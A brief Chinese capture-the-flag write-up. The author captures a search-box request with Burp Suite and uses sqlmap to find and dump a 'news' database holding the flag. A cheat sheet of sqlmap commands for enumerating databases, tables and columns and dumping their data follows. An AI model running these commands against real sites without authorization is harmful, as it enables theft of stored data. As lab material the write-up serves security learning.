打开后,只有个搜索框,可以看出是sql注入,用bp抓包,随便输入个数
将抓包后的header方数据存储在1.txt文件上(文件放在sqlmap的目录下),用sqlmap爆库,
-r 1.txt -dbs
发现一个news数据库
-r 1.txt -D news --dump
查看数据库内容
得到flag
(sqlmap -u “注入地址” --dbs // 列举数据库
sqlmap -u “注入地址” --tables -D “数据库” // 列举数据库的表名
sqlmap -u “注入地址” --columns -T “表名” -D “数据库” // 获取表的列名
sqlmap -u “注入地址” --dump -C “字段,字段” -T “表名” -D “数据库” // 获取表中的所有数据
sqlmap -r “含http头的文件” --dbs // 列举数据库
sqlmap -r “含http头的文件” --tables -D “数据库” // 列举数据库的表名
sqlmap -r “含http头的文件” --columns -T “表名” -D “数据库” // 获取表的列名
sqlmap -r “含http头的文件” --dump -C “字段,字段” -T “表名” -D “数据库” // 获取表中的所有数据
)